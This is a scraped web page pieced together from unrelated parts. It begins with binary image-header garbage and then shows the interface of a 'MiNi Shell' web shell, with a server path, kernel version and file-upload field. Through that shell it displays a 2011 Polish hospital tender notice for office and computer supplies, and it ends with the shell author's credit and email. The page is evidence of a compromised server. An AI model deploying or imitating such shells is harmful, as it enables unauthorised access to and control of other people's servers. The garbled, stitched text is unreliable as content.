JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110519/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110519/142939-N-2011.html

<p class="kh_header"><b>Siemianowice Śląskie: Wykonywanie dla potrzeb Szpitala Miejskiego w Siemianowicach Śląskich dostaw materiałów biurowych, materiałów eksploatacyjnych do komputerów i kserokopiarek</b><br>
<b>Numer ogłoszenia: 142939 - 2011; data zamieszczenia: 19.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Miejski w Siemianowicach Śląskich , ul. 1-go Maja 9, 41-100 Siemianowice Śląskie, woj. śląskie, tel. 032 2281930, faks 032 2281498.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsiemianowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie dla potrzeb Szpitala Miejskiego w Siemianowicach Śląskich dostaw materiałów biurowych, materiałów eksploatacyjnych do komputerów i kserokopiarek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawa materiałów biurowych, materiałów eksploatacyjnych do komputerów i kserokopiarek.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.12.51.10-5, 30.12.51.20-8, 30.19.20.00-1, 30.19.70.00-6, 30.23.43.00-1, 30.23.44.00-2, 30.23.70.00-9, 30.19.76.42-8, 30.19.93.30-2, 30.19.76.44-2, 30.19.76.20-8, 30.19.97.20-3, 30.19.94.10-7, 30.19.76.30-1, 30.19.72.20-4, 30.19.92.30-1, 30.19.92.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia będzie uważany za spełniony jeżeli wykonawca wykaże, iż w okresie ostatnich trzech lat, a jeżeli okres działalności jest krótszy - w tym okresie - wykonał co najmniej 1 dostawę materiałów biurowych, materiałów eksploatacyjnych do komputerów i kserokopiarek o łącznej wartości co najmniej 5 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-Prawidłowo wypełniony formularz ofertowy z wykorzystaniem wzoru - załącznik Nr 2 do siwz
-Zaakceptowane  i podpisane warunki projektu umowy - załącznik nr 4 do siwz
-Oświadczenie o zapoznaniu się z warunkami postępowania  - załącznik nr 5 do siwz.
-Wypełniony Formularz cenowy stanowiący załącznik Nr 7 do siwz</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Dostawcy, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego, a także dotyczą:
-zmiany ilości zamawianego asortymentu przy zachowaniu cen jednostkowych zgodnych z ofertą Dostawcy,
-obniżenia cen w stosunku do cen ofertowych przez Dostawcę, 
-zmiany numeru katalogowego produktu lub jego nazwy przy zachowaniu tożsamości dostarczanego produktu i jego cech jakościowych nie gorszych niż produkt zaoferowany w ofercie,
-zmiany danych Stron (np. zmiana siedziby, adresu, nazwy),
-działania siły wyższej lub wystąpienia stanu wyższej konieczności,
-zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe,
-zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,
-omyłek pisarskich lub błędów rachunkowych,
-mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
-jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsiemianowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Miejski w Siemianowicach Śląskich
ul. 1-go Maja 9
41-100 Siemianowice Śląskie
Dział Zamówień Publicznych, (budynek główny Szpitala Miejskiego w Siemianowicach Śląskich).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2011 godzina 09:30, miejsce: Szpital Miejski w Siemianowicach Śląskich
ul. 1-go Maja 9
41-100 Siemianowice Śląskie
Dział Zamówień Publicznych, (budynek główny Szpitala Miejskiego w Siemianowicach Śląskich).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Spinacze biurowe małe
2.		Spinacze biurowe duże
3.		Zszywki
4.		Teczka plastikowa do wpinania
5.		Skoroszyt plastikowy oczko
6.		Segregator A4 7 cm kolorowe 
7.		Segregator A4 5 cm kolorowe
8.		Segregator A4 5 cm kolorowe
9.		Mazaki (czarny, zielony, niebieski, czerwony)
10.		Marker biały (RTG)
11.		Markery do tablicy (ścieralne)
12.		Markery czarne wodoodporne
13.		Marker permanentny do opisywania płyt CD/DVD biały końcówką okrągłą 1 mm
14.		Marker permanentny do opisywania płyt CD/DVD czarny końcówką okrągłą 1 mm
15.		Linijka 25 cm.
16.		Gumka ołówkowa
17.		Ołówek zwykły
18.		Długopisy zwykłe
19.		Koszulka z folii A4 (grubość folii minimum 55 mikronów)
20.		Koszulka z folii A5 (grubość folii minimum 55 mikronów)
21.		Obwoluta (twarda) - koperta z folii
22.		Klej biurowy w tubce
23.		Korektor w płynie z pędzelkiem
24.		Korektor w taśmie
25.		Taśma klejąca bezbarwna szer. od1,8 cm do 2,5 cm
26.		Taśma pakowa bezbarwna
27.		Tusz do stempli automatycznych czarny
28.		Zszywacz
29.		Dziurkacz na co najmniej 10 kartek
30.		Folie do laminowania A 4 ( minimum 100 mikronów)
31.		Folie do laminowania A 5 (minimum 100 mikronów)
32.		Folie do laminowania A 7 (minimum 100 mikronów)
33.		Folia do bindowania
34.		Grzbiety plastikowe do bindowania
35.		Karton do bindowania
36.		Zakreślacze
37.		Blok listowy A4 w kratkę zwykły
38.		Blok listowy A4 w kratkę z twardym tyłem i z dziurami 
39.		Pudła archiwizacyjne szer. 10 cm
40.		Pudła archiwizacyjne szer. 15 cm
41.		Pudła archiwizacyjne szer. 20 cm
42.		Pudła archiwizacyjne szer. 25 cm
43.		Sticksy 5 x 5 cm
44.		Sticksy 2x 5 cm
45.		Sticksy 7,5 x 7,5cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6, 30.19.97.20-3, 30.19.94.10-7, 30.19.72.20-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> artykuły papiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Papier ksero A4 - POLUX
2	Papier ksero A3 - POLUX
3	Papier do drukarek 240 x 1
4	Papier do drukarek 240 x 2
5	Papier do drukarek 240 x 3
6	Papier fax 210 mm - 30 m
7	Koperta listowa C6
8	Koperty białe B5 z klejem
9	Koperty szare B5 z klejem
10	Koperty białe B4 z klejem
11	Koperty szare B4 z klejem
12	Papier kancelaryjny A3 kratka
13	Koperty RTG 37 x 37
14	Koperty RTG 45 x 37
15	Koperta RTG 20 x 25
16	Koperta RTG 25 x 32
17	Zeszyt A4 60 kartek (szyty) w miękkiej okładce
18	Zeszyt A5 60 kartek (szyty) w miękkiej okładce
19	Zeszyt A4 60 kartek (szyty) w twardej okładce
20	Zeszyt A5 60 kartek (szyty) w twardej okładce
21	Teczka do wiązania A4
22	Teczka do wiązania A3
23	Teczka z gumką
24	Koperty papierowe na CD/DVD-R z okienkiem foliowym przeźroczystym
25	Etykiety samoprzylepne 
np. EMERSON (lub równoważne, co do trwałości, jakości i parametrów1)
Format A4 (297 x 2010)
Ilość w opakowaniu 100 etykiet
Fotomat etykiety297 x 210 z naciętym podkładem do wydruku na drukarkach laserowych, atramentowych i ksero.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.42-8, 30.19.93.30-2, 30.19.76.44-2, 30.19.76.30-1, 30.19.92.30-1, 30.19.92.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Materiały eksploatacyjne do komputerów i kserokopiarek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Taśma do drukarek OKI ML 3320/3321
(kod producenta OKI 09002303)
2	Taśma do drukarek OKI ML 3390
(kod producenta OKI 09002309)
3	Taśma do drukarki Panasonic KX-P2130
(kod producenta Panasonic KX-P160)
4	Taśma do drukarki Epson LX-300t
5	Taśma do metkownicy - 1 rzędowe białe
6	Taśma do metkownicy - 3 rzędowe białe
7	Tusz do drukarek HP typ HP15 (C6615NE)
8	Tusz do drukarek HP typ HP27 (C8727AE)
9	Tusz do drukarek HP typ HP54 (CB334AE)
10	Tusz do drukarek HP typ HP57 (C6657AE)
11	Tusz do drukarek HP typ HP338 (C8765EE)
12	Tusz do drukarek HP typ HP343 (C8766EE)
13	Toner do drukarek HP LJ 1010,1018,1020 typ 12A (Q2612A)
14	Toner do drukarek HP LJ 1100 typ 92A (C4092A)
15	Toner do drukarek HP LJ 1200 typ 15A (C7115A)
16	Toner do drukarek HP LJ P1005 typ 35A (CB435A)
17	Toner do drukarek HP LJ P2055DN typ HP CE505X 
18	Toner do drukarek HP LJ M1522nf typ HP CB436A 
19	Toner do drukarek HP CLJ CM2320fxi typ HP CC530A
20	Toner do drukarek HP CLJ CM2320fxi typ HP CC531A
21	Toner do drukarek HP CLJ CM2320fxi typ HP CC532A
22	Toner do drukarek HP CLJ CM2320fxi typ HP CC533A
23	Toner do drukarki HP LJ 4250DN typ HP Q5942A
24	Toner do drukarki HP LJ 8000DN typ HP C3909A
25	Toner do drukarek OKI B430DN typ OKI 43979202
26	Toner do Ksero Canon ir2270 typ C-EXV11 (CF9629A002AA)
27	Toner do Ksero Canon ir1600 typ C-EXV5 (CF6836A002AA)
28	Toner do Ksero Canon NP 6035 typ NPG-13
29	Toner do Ksero Konica Minolta BizHub 160 typ TN-113
30	Bęben do Drukarki OKI B430DN typ OKI 43979002
31	Bęben do Ksero Canon ir2270 typ Canon IR2270-4570
32	Bęben do Ksero Canon ir1600 typ Canon CF6837A003AA
33	Bęben do ksero Canon NP 6035
34	Taśma do maszyn 13 mm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.12.51.10-5, 30.12.51.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Recepty RUM.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Recepta RUM biała składanka (1+1).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.93.30-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Nośniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Płyty CD - R 
VERBATIM kod 43432 lub równoważne, co do trwałości, jakości, parametrów i właściwości
2	Płyty DVD - R 
VERBATIM kod 43522 lub równoważne, co do trwałości, jakości, parametrów i właściwości
3	Płyty DVD + R 
VERBATIM kod 43500 lub równoważne, co do trwałości, jakości, parametrów i właściwości
4	Płyty DVD + RW 
VERBATIM kod 43489 lub równoważne, co do trwałości, jakości, parametrów i właściwości
5	DYSKIETKI
VERBATIM kod 87410 lub równoważne, co do trwałości, jakości, parametrów i właściwości
6	Taśma do STREAMERA
HP DAT 72 kod C8010A lub równoważne, co do trwałości, jakości, parametrów i właściwości
7	Taśma czyszcząca do STREAMERA HP 
kod C57094A lub równoważne, co do trwałości, jakości, parametrów i właściwości
8	Taśma do STREAMERA
HP DAT 24 kod C5708A lub równoważne, co do trwałości, jakości, parametrów i właściwości.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.43.00-1, 30.23.44.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Artykuły czyszczące do komputerów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sprężone powietrze
2	Pianka antystatyczna do czyszczenia obudowy
3	Pianka antystatyczna do czyszczenia wyświetlaczy ciekłokrystalicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.02.37.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com